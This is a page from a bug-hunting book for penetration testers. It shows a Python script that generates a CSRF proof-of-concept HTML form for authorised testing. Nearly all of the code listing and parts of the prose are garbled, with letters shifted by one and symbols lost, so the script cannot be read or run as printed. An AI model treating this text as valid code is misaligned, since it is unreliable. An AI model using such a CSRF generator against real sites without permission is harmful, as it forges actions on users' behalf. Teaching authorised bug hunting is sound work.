Page 126 - Hands-On Bug Hunting for Penetration Testers

P. 126

CSRF and Insecure Session Authentication Chapter 6

Peasoup d the ugliest and most cursed of colors. But more importantly for us, the success
message shows our PoC has proved what it set out to do. After we do one more refactoring
pass d putting the command-line argument parsing in the JG @@OBNF@@ @@NBJO@@
bootstrapping conditional, where it belongs d and adding a PEP8-compatible function
docstring, this is what our DTSG@QPD@HFOFSBUPS QZ looks like:
VTS CJO FOW QZUIPO
JNQPSU TZT
JNQPSU BTU

GSPN CT JNQPSU #FBVUJGVM4PVQ 5BH
EFG HFOFSBUF@QPD NFUIPE FODPEJOH@UZQF BDUJPO GJFMET
(FOFSBUF B $43' 1P$ VTJOH CBTJD GPSN EBUB
DPOUFOU #FBVUJGVM4PVQ IUNM IUNM IUNM QBSTFS
IUNM@UBH DPOUFOU GJOE IUNM
GPSN@UBH DPOUFOU OFX@UBH GPSN BDUJPO BDUJPO NFUIPE NFUIPE
FODUZQF FODPEJOH@UZQF
IUNM@UBH BQQFOE GPSN@UBH
GPS GJFME JO GJFMET
MBCFM@UBH DPOUFOU OFX@UBH MBCFM
MBCFM@UBH TUSJOH GJFME< MBCFM >
GJFME@UBH DPOUFOU OFX@UBH JOQVU UZQF GJFME< UZQF >
WBMVF GJFME< WBMVF >
GJFME@UBH< OBNF > GJFME< OBNF >
GPSN@UBH BQQFOE MBCFM@UBH
GPSN@UBH BQQFOE GJFME@UBH
TVCNJU@UBH DPOUFOU OFX@UBH JOQVU UZQF TVCNJU WBMVF BDUJPO
GPSN@UBH BQQFOE TVCNJU@UBH

SFUVSO DPOUFOU QSFUUJGZ
JG @@OBNF@@ @@NBJO@@
NFUIPE TZT BSHW< >
FODPEJOH@UZQF TZT BSHW< >
BDUJPO TZT BSHW< >
GJFMET BTU MJUFSBM@FWBM TZT BSHW< >
QSJOU HFOFSBUF@QPD NFUIPE FODPEJOH@UZQF BDUJPO GJFMET

With our script all cleaned up and the vulnerability successfully proven, now we can write
our report.

[ 111 ]

121 122 123 124 125 126 127 128 129 130 131